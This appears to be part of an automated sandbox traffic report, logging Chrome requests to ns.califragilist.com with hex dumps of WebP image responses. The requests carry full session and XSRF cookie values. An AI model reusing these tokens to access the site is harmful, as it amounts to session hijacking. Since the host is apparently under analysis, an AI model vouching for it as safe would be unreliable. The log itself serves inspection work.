                                                                                                                                              93192.168.2.1849885188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:06 UTC1115OUTGET /yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvh HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:07 UTC979INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:07 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIMmxHdUAdJDVYR%2FHhu%2F2x7Q%2BXf6CYX1JPIshrOr4ZqVSm5aVNFzWWyxA71FmbQx7Y%2BjsuC1S71OBszqp1cr8sV0Lim3gKZq2RgIDlanPKeSAOtYNULu6c8VsAwAmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3344&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2034&delivery_rate=859092&cwnd=32&unsent_bytes=0&cid=78e4a5e3f1d097db&ts=127&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6458e4b96e743-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19126&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1693&delivery_rate=151401&cwnd=32&unsent_bytes=0&cid=d518705fee0f76f4&ts=562&x=0"
                                                                                                                                              2024-11-06 15:56:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              94192.168.2.1849887188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:06 UTC1134OUTGET /ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:07 UTC1041INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:07 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 25216
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2GNCgA1DDmZW81vEPBhKom5xVlIC4lK%2Bc7OA9OkgnkGlULLWzCUgSYdtfGRA9edxrHQ3e5MYfBY5whM1ltOAqFB%2FS%2F1PsZw1hFD1WQe8FAfvX8dw7%2BOFp82UP1mlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3478&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2056&delivery_rate=857058&cwnd=251&unsent_bytes=0&cid=cf5c0f56f95178d7&ts=134&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6458ecf96e9b9-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1712&delivery_rate=2479452&cwnd=251&unsent_bytes=0&cid=8e2906da8b7a55b2&ts=538&x=0"
                                                                                                                                              2024-11-06 15:56:07 UTC328INData Raw: 52 49 46 46 78 62 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 6f 08 00 ba 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFxbWEBPVP8X0oICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 a0 59 00 00 01 ff 27 24 48 f0 ff 78 6b 44 a4 ee e1 8f ff 6f 55 53 fa ff 5b d7 75 4d 07 03 c3 d0 43 77 49 a3 48 23 dd 48 a7 74 28 1d 0e 21 4a 8b 41 4a 23 20 a1 28 8d 84 d2 1d d2 dd cd 90 13 30 1d 57 ac 3f 44 e6 9a b5 d6 de 67 e6 36 af eb 75 8b e8 ff 04 80
                                                                                                                                              Data Ascii: 8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPHY'$HxkDoUS[uMCwIH#Ht(!JAJ# (0W?Dg6u
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 65 de fe 3b 92 f5 e0 c9 bc fa 6e 20 a4 b9 fe 86 64 19 f0 ac a7 0b 98 ec cf 50 c4 73 fd bd 41 d4 ac 3d 76 24 a9 ee c1 bc 1a 26 10 35 67 c8 03 11 70 9e eb 17 f3 1e 14 d0 ba a6 14 08 9c f9 b3 83 76 75 85 ce 2c 03 02 5b da 5f 92 00 db ba 7c 99 88 fc 93 d7 14 03 a9 83 43 ee 28 29 71 47 7b 37 90 ba fe 29 01 de 14 72 f1 52 db c6 2e f1 a7 bc 20 b9 a9 c6 f2 28 d5 9c 1c 90 19 44 6f 78 82 1d 9e f5 74 e9 92 fd 19 72 df 57 12 c4 f7 ea 71 55 21 89 1b 3e 04 f9 5b 3c e0 86 f3 5d b9 98 f7 20 f3 eb 0d 40 89 a6 86 3b ed 6a 78 36 21 1b 28 d1 fb eb 38 66 d8 d6 85 cb e7 c8 fb cd 50 37 50 66 d1 79 51 f2 9d ee ec 0e ca cc bb 9e 59 58 76 97 2d f9 63 78 ed ce 03 4a cd 34 f4 81 68 f6 cd 1f 82 5a 5b be 60 85 7f b8 6a 31 fd 8d 9c a3 fa 9b 40 b5 e6 f6 b7 c4 b2 ef a8 00 ca cd bc 94 15
                                                                                                                                              Data Ascii: e;n dPsA=v$&5gpvu,[_|C()qG{7)rR. (DoxtrWqU!>[<] @;jx6!(8fP7PfyQYXv-cxJ4hZ[`j1@
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: d4 c5 98 63 f3 ba 06 a7 07 99 4e 23 f9 b7 d9 74 a6 1f d2 ef 62 cc 72 d8 89 25 e5 50 d5 40 64 9c d8 02 8c e5 54 6a bf ea 5d 91 49 f7 50 85 97 c6 e7 4b 23 29 69 d3 86 77 de ff a5 57 91 f4 9e f6 c8 70 a6 c6 78 be 64 70 d7 64 c8 7a 23 f1 df 40 d1 35 92 18 25 34 01 83 99 d7 4a 2c d2 5d df b2 7c 7e 12 95 69 df df dd 27 2d 64 1a ea e7 d3 65 ad fd d2 73 b6 73 b8 a7 31 2d 90 63 79 43 b6 95 5a 75 45 e5 7e 81 7c e3 1a 80 e1 dc 4c 0c eb ea 5a a5 15 f1 a8 d6 a8 25 65 d3 3e 8e 68 08 22 26 ee 1d 5e 34 dd e6 15 07 f4 d7 97 e9 2c 7a 1a 31 ef 58 62 97 40 cd 96 43 c8 37 b6 2e 18 cf 4f a8 cd d1 32 af 1e a7 51 c5 47 3a ba a7 71 dc d4 93 7f 5f 1a 57 30 5d c6 cd c1 22 9f be ac 64 31 dc 88 35 43 e2 fd 15 35 05 f9 46 d7 04 03 6a ba 41 ec 9e 86 05 4d 0d 43 55 3f 1d e5 9f a6 f1 50
                                                                                                                                              Data Ascii: cN#tbr%P@dTj]IPK#)iwWpxdpdz#@5%4J,]|~i'-dess1-cyCZuE~|LZ%e>h"&^4,z1Xb@C7.O2QG:q_W0]"d15C5FjAMCU?P
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: de 3d 1b 11 97 c0 7b fe c7 5d 33 00 14 b0 fd d7 49 52 a7 94 51 ca ca e2 1b 30 ec 35 68 75 54 5c c0 4d 34 9c 8e 56 e9 3e f8 30 57 46 96 e4 2b 88 d8 0c 00 66 21 e2 ed 98 7f 3d 24 b5 46 19 7b 91 e3 49 37 e3 96 83 d6 70 b5 99 77 a2 01 8d 2c 98 ee 83 17 7d 33 b2 f4 44 c4 3d 00 7e 6f 10 71 60 14 22 9a 12 48 4d 56 45 4b e4 18 5d 18 0c 7c 1c a9 ef d4 36 1d 0d e9 71 4b ba 0f 6e 30 65 60 f1 7c 8e e8 28 09 9f 23 62 98 f7 bf 02 91 f4 40 45 78 de 65 d1 1b 8c fc 5d 52 6b 95 d6 ce 61 4c 70 7c fa 0f 8e cb c0 02 e3 11 71 91 e9 26 22 4e 86 7f 95 a6 d5 4a 11 23 90 e3 66 30 f4 c7 48 ed 57 59 d9 18 94 de f6 e4 e4 8e 5f 66 4f 08 f9 b2 7f ff c1 21 e3 66 ce 5c b4 ee e0 b5 30 15 24 57 4c ff b1 37 cd c0 12 18 8b 18 db 09 11 13 b2 bf a3 3e ad aa 6a c8 12 c1 e1 79 90 b1 fb 83 d4 75
                                                                                                                                              Data Ascii: ={]3IRQ05huT\M4V>0WF+f!=$F{I7pw,}3D=~oq`"HMVEK]|6qKn0e`|(#b@Exe]RkaLp|q&"NJ#f0HWY_fO!f\0$WL7>jyu
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 66 a7 37 19 14 6f ee 1f 89 c4 b7 8b 76 9e d4 74 a5 74 42 f6 51 55 40 b5 59 2e 72 c3 86 69 7d e0 b5 47 00 1c 99 a1 25 82 54 7f c9 96 22 f9 17 7e 8a 2b 73 1c c9 db 8b 49 76 93 d4 57 4a 39 c3 2e b1 1e a8 37 db 5d 6e df a7 f9 81 f7 5e 01 1e 5a 32 b2 84 92 1a 26 58 8e 04 7a 03 40 e9 de 33 92 91 e1 62 c9 1e 91 1a a5 92 5a c8 dd de 01 54 5c 22 92 d9 a6 b4 3f f0 3e c8 0f db 66 64 b9 4b 6a 9c 60 93 90 fc 0d 37 a5 35 ba 8f 2c e3 82 04 7b 4d ea 73 95 6c 63 37 02 d4 5c 3f 99 d7 41 55 64 ab dc 76 c4 9c 35 3b 4f dd 0e 8f 8c 46 c4 84 c8 c8 a7 b7 4f ed 5a 33 37 a4 d3 c7 b9 4d 46 0f 32 5d e4 77 4c be 4c e5 5a 0e 9d b5 76 f7 e9 bb 91 91 6f 11 13 23 23 1f 5d de ff db bc d1 6d 3e f0 d5 31 8f 62 0d fa 4e 5b b5 fd f8 cd 57 91 91 76 b4 45 46 86 de 3c b6 75 f9 e4 9e b5 82 4d 5a
                                                                                                                                              Data Ascii: f7ovttBQU@Y.ri}G%T"~+sIvWJ9.7]n^Z2&Xz@3bZT\"?>fdKj`75,{Mslc7\?AUdv5;OFOZ37MF2]wLLZvo##]m>1bN[WvEF<uMZ
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 22 cf 82 84 3e a4 55 51 a4 d9 48 fd 92 49 31 e6 41 6f 50 54 6b 1e 91 7e 21 75 42 15 9d 90 73 6c b0 26 64 09 4f 9d 3b 63 73 83 dc 1f ec 41 e1 df 8c f1 34 48 45 93 58 61 15 4e d9 d7 39 50 60 fb 34 f3 7f 99 93 38 9c e7 53 fd 1a 8a bc 29 93 a2 02 57 38 50 e2 97 75 04 b9 c0 e7 a9 59 88 f5 4c ca 12 2a 4c ab 91 44 1e 61 e4 ba 82 5a 3f 38 89 d2 4e 14 69 27 a9 3f 55 b1 99 d5 34 d0 c5 a1 a9 10 fb 4b 4d 13 c8 1d b8 cc 86 f2 3f 6c 63 8c e0 7b 5e df f2 31 f5 8d 40 a1 ff cc f4 1f 99 90 e3 4d 2e 99 17 db 51 e8 5b a5 95 d4 f9 25 0a 6d 1d 63 12 e3 0a 1f ac 23 83 db 1b 26 41 84 02 68 75 95 a8 1d 52 7f ec ae 14 9f ef 92 51 dc c7 16 89 4e 93 5a a9 08 bf 78 4e 11 99 b5 c1 fd 96 b3 4e f5 cb 04 92 77 7b 85 6a dc 9e cf 10 65 8e 64 75 8b 4d e1 a3 28 f7 f5 bc ea 69 fe 1c e5 8e 69
                                                                                                                                              Data Ascii: ">UQHI1AoPTk~!uBsl&dO;csA4HEXaN9P`48S)W8PuYL*LDaZ?8Ni'?U4KM?lc{^1@M.Q[%mc#&AhuRQNZxNNw{jeduM(ii
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: d4 b5 e1 8c 6e f0 aa 89 3c b7 02 f9 8a b4 16 4b 92 39 89 98 35 87 60 cd 1f a1 72 57 49 e2 91 4c ea 90 12 cc 71 7c 96 83 e1 76 ff 1b b5 d2 de c5 a8 c0 0a 46 a3 09 e4 7f 8e 46 a2 78 04 1a 09 f3 16 d4 b6 02 8c b0 00 ab 29 4c fa d1 f3 b1 93 3a 22 c9 67 48 7c 07 88 9d 7b 23 2a f8 b5 45 90 52 48 7a 91 12 8a 22 df 8e 86 cb b4 1a 35 33 a9 be 51 e9 c2 68 65 ea 65 ba 8e 46 22 f0 1e 1a 8a ef 51 df e0 22 a3 41 ac 4e f2 70 04 d3 83 87 a4 de 98 04 f9 93 5a 5b a9 cc 83 a3 50 c9 35 04 e9 4c 6b a8 12 5a f3 71 e4 30 5c d3 51 3b a3 ca 1b 94 3c 8c 4e a7 9a 69 2b 1a 09 f3 6e 34 14 ed 1d 3a 37 89 d1 9f 9c 02 ac 3c 2e 02 c3 dd a4 b0 98 1c 3e f1 c4 22 3c 85 2a ff 0f 2a fa 07 41 66 d1 6a a0 84 af f8 5c 03 a3 3d 00 35 f4 59 7e 63 02 77 f9 44 a5 da 04 34 14 93 d0 50 94 8c 46 9d 2b
                                                                                                                                              Data Ascii: n<K95`rWILq|vFFx)L:"gH|{#*ERHz"53QheeF"Q"ANpZ[P5LkZq0\Q;<Ni+n4:7<.>"<**Afj\=5Y~cwD4PF+
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: df 04 ef eb 5e ac c5 d7 07 13 d4 e1 f3 42 16 eb a9 19 6d cb 7a c2 7b e7 ae f3 f9 ef 2f 95 51 81 d1 3c 06 4b 78 dc 01 c6 e3 68 61 09 7e c7 89 55 92 64 89 1c d1 c3 2c e0 d4 71 b4 b0 3d bf 99 b4 ac 7e 6a a8 c5 a7 bf 41 72 bf 27 c6 9b ad 83 4b 82 13 b3 b4 59 70 43 0c 9c 66 2c e6 f0 69 e5 0c af 57 a2 5c 99 ff 69 10 38 31 eb a7 f3 ae 28 e3 a2 24 d7 c6 56 b2 80 73 bd ea fe f0 4c 11 83 51 d0 88 45 4d fd c1 c9 a5 87 9e 52 03 3c e2 73 87 c1 7d 1e 73 38 d5 20 36 82 9d 6f 12 ad 17 26 49 ba 88 b1 25 18 9c 5c 96 d8 12 7e 97 69 fd 03 6a ac cf a7 bb 41 1a 80 32 26 fe d1 c4 02 ce 2f f8 cd 03 21 62 b2 1b 8a ef f8 b4 77 46 1f 94 f3 de a4 22 90 8a 45 be b9 ab 84 da 28 66 d8 dc 8a 90 aa 96 46 eb e2 15 60 be 2d 86 75 7b 5b 4f 48 d5 62 53 9f a8 60 1e 1f 2c 42 ae 10 f2 6c c0 c9
                                                                                                                                              Data Ascii: ^Bmz{/Q<Kxha~Ud,q=~jAr'KYpCf,iW\i81($VsLQEMR<s}s8 6o&I%\~ijA2&/!bwF"E(fF`-u{[OHbS`,Bl
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 11 ea 8c 2c 4f 00 7f d3 73 5a f8 39 a3 7b b4 fa 08 05 4b 29 9d a9 00 d4 0f d0 0a 61 74 9e d8 58 75 54 e3 b3 cf f8 5c 61 34 02 d8 67 ba c4 07 bf 34 08 01 c8 d7 33 05 25 91 75 5c 45 60 5f 3e 4e 16 4b 24 af 89 c0 de b4 43 98 59 bc 2e 78 01 fb 6e 52 4d e6 73 8f d0 0a 1e 13 04 80 55 c4 0e f2 09 70 d0 2a 2c 55 96 97 64 a2 86 58 80 fc 44 5a eb f8 14 42 e2 e5 d5 51 82 cf 35 35 64 ea b9 f6 f0 39 e1 0f 2e 6f eb e6 a4 92 c8 77 25 08 98 37 9c cf 79 83 50 9a 4f 1c a4 70 18 af cf 41 c0 01 b2 54 45 d6 27 2c fc 20 fb 2b 59 ae b0 4a 28 05 02 ae 17 aa 22 1f 2c 46 e7 31 8f f2 12 74 24 66 cb ce a6 06 92 0e 05 b1 3b 53 d9 9c 07 18 d6 a6 75 89 cf 97 c4 9e 99 d4 91 9d 4f 84 12 3e 0f 47 25 de ab e7 9c 31 7c ee fa 49 00 6d f8 38 72 1b 83 a6 7c 9e a6 64 27 ab 9d 26 09 60 bb 28 13
                                                                                                                                              Data Ascii: ,OsZ9{K)atXuT\a4g43%u\E`_>NK$CY.xnRMsUp*,UdXDZBQ55d9.ow%7yPOpATE', +YJ(",F1t$f;SuO>G%1|Im8r|d'&`(


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              95192.168.2.1849888188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:06 UTC1137OUTGET /qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:07 UTC1042INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:07 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 9648
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5oiLvoAPaLBSC%2FrKIi1%2FZMaJ4seDWLJlqMDVMrAo%2BNkKrO484zC9dfqHsYTnVs7c%2FU2JEIiv2AtHwFg8mMAbqfkbizex1xDKgQsq1afNCXeX5M6FblD5nMebGYiLBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3307&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2058&delivery_rate=873341&cwnd=251&unsent_bytes=0&cid=84641fe78aeb02b3&ts=99&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6458ffecd6c64-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1715&delivery_rate=2383539&cwnd=251&unsent_bytes=0&cid=c5b39b45bc44b226&ts=506&x=0"
                                                                                                                                              2024-11-06 15:56:07 UTC327INData Raw: 52 49 46 46 a8 25 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 f9 01 00 2e 01 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFF%WEBPVP8X0.ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 f7 02 00 00 01 0f 30 ff 11 11 82 6e b3 6d 75 04 eb 47 04 84 74 30 34 32 1a b7 b5 97 91 40 da c6 e8 60 5b a0 04 b2 25 b0 fc 05 36 18 f3 99 d9 cb 39 41 44 ff 27 40 fe 2c 66 cf b6 42 91 01 86 2b 00 96 2b 02 8e 2b 01 0b 57 26 db 70 b8 d0 c1 d0 a0 ea 68 ac
                                                                                                                                              Data Ascii: 8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH0nmuGt042@`[%69AD'@,fB+++W&ph
